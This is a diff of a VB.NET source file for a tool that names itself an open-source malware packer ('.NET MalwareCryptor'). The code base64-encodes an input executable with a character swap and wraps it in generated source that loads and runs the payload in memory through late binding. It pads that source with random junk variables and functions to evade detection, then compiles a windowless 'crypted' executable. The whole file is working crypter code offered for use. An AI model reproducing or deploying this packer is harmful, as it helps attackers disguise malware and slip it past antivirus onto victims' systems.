|
| 1 | +Imports System.CodeDom.Compiler |
| 2 | +Imports System.Reflection |
| 3 | +Imports System.IO |
| 4 | +Imports System.Security.Cryptography |
| 5 | +Imports System.Text |
| 6 | + |
| 7 | +Module Module1 |
| 8 | + Sub Main() |
| 9 | + Console.WriteLine(" .NET MalwareCryptor :: OpenSource malware packer" & vbCrLf & " https://github.com/DosX-dev/NET-MalwareCryptor" & vbCrLf) |
| 10 | + |
| 11 | + ' Checking for command line arguments |
| 12 | + If My.Application.CommandLineArgs.Count <> 1 Then |
| 13 | + Console.WriteLine("Invalid number of command line arguments." & vbCrLf & "Usage: ... <file>") |
| 14 | + Exit Sub |
| 15 | + End If |
| 16 | + |
| 17 | + Dim filePath As String = My.Application.CommandLineArgs(0) |
| 18 | + |
| 19 | + ' Checking if the specified file exists |
| 20 | + If Not File.Exists(filePath) Then |
| 21 | + Console.WriteLine("The specified file does not exist.") |
| 22 | + Exit Sub |
| 23 | + End If |
| 24 | + |
| 25 | + ' Loading the file content |
| 26 | + Dim fileBytes As Byte() = File.ReadAllBytes(filePath), |
| 27 | + base64String As String = Convert.ToBase64String(fileBytes) |
| 28 | + |
| 29 | + ' Getting the assembly name without the extension |
| 30 | + Dim assemblyName As String = Path.GetFileNameWithoutExtension(filePath), |
| 31 | + source As String = "Imports System" & vbCrLf & |
| 32 | + "Imports System.Reflection" & vbCrLf & |
| 33 | + "Imports Microsoft.VisualBasic.CompilerServices" & vbCrLf & |
| 34 | + "Imports System.Runtime.CompilerServices" & vbCrLf & |
| 35 | + "Module Program" & vbCrLf & |
| 36 | + "Private EP = ""EntryPoint"", INV = ""Invoke"", L = ""Load"" , N = Nothing, T = True, F = False" & vbCrLf & |
| 37 | + GenerateJunkVariables() & vbCrLf & |
| 38 | + "Sub Main()" & vbCrLf & |
| 39 | + GenerateJunkVariables() & vbCrLf & |
| 40 | + "Inject(GetStub(System.Convert.FromBase64String(""" & base64String.Replace("m", "_") & """.Replace(""_"", ""m""))))" & vbCrLf & |
| 41 | + GenerateJunkVariables() & vbCrLf & |
| 42 | + "End Sub" & vbCrLf & |
| 43 | + "Sub Inject(payload As Object)" & vbCrLf & |
| 44 | + GenerateJunkVariables() & vbCrLf & |
| 45 | + "NewLateBinding.LateCall(NewLateBinding.LateGet(payload, N, EP, New Object(-1) {}, N, N, N), N, INV, New Object() { N, N }, N, N, N, T)" & vbCrLf & |
| 46 | + GenerateJunkVariables() & vbCrLf & |
| 47 | + "End Sub" & vbCrLf & |
| 48 | + "Function GetStub(payload As Object)" & vbCrLf & |
| 49 | + GenerateJunkVariables() & vbCrLf & |
| 50 | + "Dim result = NewLateBinding.LateGet(N, GetType(Assembly), L, New Object() { RuntimeHelpers.GetObjectValue(payload) }, N, N, New Boolean() { T })" & vbCrLf & |
| 51 | + GenerateJunkVariables() & vbCrLf & |
| 52 | + "Return result" & vbCrLf & |
| 53 | + "End Function" & vbCrLf & |
| 54 | + GenerateJunkFunctions() & vbCrLf & |
| 55 | + "End Module" |
| 56 | + |
| 57 | + |
| 58 | + Dim provider As New VBCodeProvider(), |
| 59 | + parameters As New CompilerParameters With { |
| 60 | + .GenerateExecutable = True, ' Generating an executable file (.exe) |
| 61 | + .OutputAssembly = assemblyName & ".crypted.exe", ' Name and path to save the executable file |
| 62 | + .CompilerOptions = "/target:winexe /platform:x86" ' Compiler options to create a 32-bit console-less file |
| 63 | + }, |
| 64 | + results As CompilerResults = provider.CompileAssemblyFromSource(parameters, source) |
| 65 | + |
| 66 | + ' Checking for compilation errors |
| 67 | + If results.Errors.HasErrors Then |
| 68 | + Console.WriteLine("Compilation error:") |
| 69 | + For Each errorItem As CompilerError In results.Errors |
| 70 | + Console.WriteLine($" {errorItem.Line}: {errorItem.ErrorText}") |
| 71 | + Next |
| 72 | + Else |
| 73 | + Console.WriteLine("Compilation completed successfully. Created executable file '" & parameters.OutputAssembly & "'.") |
| 74 | + End If |
| 75 | + End Sub |
| 76 | + Dim random As New Random() |
| 77 | + |
| 78 | + Function GenerateJunkFunctions() As String |
| 79 | + Dim result As New StringBuilder() |
| 80 | + |
| 81 | + For i = 0 To random.Next(100, 200) |
| 82 | + result.AppendLine("Function " & GenerateRandomName() & random.Next(0, 9) & "()" & vbCrLf & "End Function") |
| 83 | + Next |
| 84 | + Return result.ToString() |
| 85 | + End Function |
| 86 | + |
| 87 | + Function GenerateJunkVariables() As String |
| 88 | + Dim result As New StringBuilder() |
| 89 | + |
| 90 | + For i = 0 To random.Next(25, 50) |
| 91 | + result.AppendLine("Dim " & GenerateRandomName() & " As Object = " & GetRandomArrayItem({"N", "Nothing", "T", "F", "True", "False", random.Next(-1000, 50000)})) |
| 92 | + Next |
| 93 | + |
| 94 | + Return result.ToString() |
| 95 | + End Function |
| 96 | + Function GetRandomArrayItem(Of T)(array As T()) As T |
| 97 | + Dim randomIndex As Integer = Random.Next(0, array.Length) |
| 98 | + Return array(randomIndex) |
| 99 | + End Function |
| 100 | + Function GenerateRandomName() As String |
| 101 | + Dim builder As New StringBuilder() |
| 102 | + |
| 103 | + Using rng As New RNGCryptoServiceProvider() |
| 104 | + Dim bytes(3) As Byte |
| 105 | + rng.GetBytes(bytes) |
| 106 | + |
| 107 | + For Each b As Byte In bytes |
| 108 | + Dim randomChar As Char = ChrW(b Mod 26 + 97) |
| 109 | + builder.Append(randomChar) |
| 110 | + Next |
| 111 | + End Using |
| 112 | + |
| 113 | + Return builder.ToString() |
| 114 | + End Function |
| 115 | +End Module |
0 commit comments